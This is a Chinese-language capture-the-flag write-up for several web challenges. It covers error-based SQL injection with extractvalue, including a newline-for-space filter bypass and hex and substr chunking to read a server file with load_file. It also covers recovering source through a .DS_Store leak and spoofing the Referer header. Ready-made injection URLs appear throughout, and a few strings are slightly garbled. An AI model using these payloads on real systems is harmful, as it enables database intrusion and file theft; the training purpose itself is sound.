wordpress

爆破得到后臺登陸路徑phpmyadmin，然后用在博客里面找到的賬號密碼登陸，然后在數據庫里找到flag

報錯注入

注入語句的格式為http://127.0.0.1/index.php?id=1' and 1=2 union select 1,2,3 from(select+count(*),concat(floor(rand(0)*2),(SQL語句))a from information_schema.tables group by a)b%23或者http://127.0.0.1/index.php?id=1 and extractvalue(1, concat(0x7e, (sql語句),0x7e))。這里union被過濾，所以用第二個。空格被過濾，但是可以用換行代替，換行的url編碼為%0a

先構造http://103.238.227.13:10088/?id=1%0aand%0aextractvalue(1,concat(0x7e,(select%0a@@version),0x7e))試試能不能成功注入，報錯顯示可以。提示告訴我們需要查詢文件，而且路徑已經給了我們，所以需要用到load_file函數。load_file函數參數是十六進制或者是ASC編碼，所以需要把路徑轉換為十六進制0x2F7661722F746573742F6B65795F312E706870，然后試試。

不能直接返回。那就試試用hex函數，返回十六進制的，由于extractvalue最多讀取32位，顯然32個并不能全部返回我們需要的，所以用substr函數一段一段的截取。http://103.238.227.13:10088/?id=1%0aand%0aextractvalue(1,concat(0x7e,substr(hex(load_file(0x2f7661722f746573742f6b65795 f312e706870))%0afrom%0a1%0afor%0a20),0x7e))，從1開始，一次截取20個，然后把內容放入hex? workspace解釋為原文件。

得到flag

sql注入2

打開是個登陸頁面，隨便輸個賬號試試

畫面是這樣的。url沒有我們熟悉的注入格式，源碼里也沒有什么有用的信息，感覺無從下手。那就掃一掃目錄？用dirsearch掃一下是這樣的

第一個是.DS_Store??? 典型的源碼泄漏...... 然后下載一個ds_store_exp.py工具下載下來源碼

直接訪問就可以得到flag

你從哪里來

打開鏈接之后，頁面詢問是否來自google，那就抓包改referer，我嘗試了?https://www.google.com.hk/? ?http://www.google.com/最后才發(fā)現原來是https://www.google.com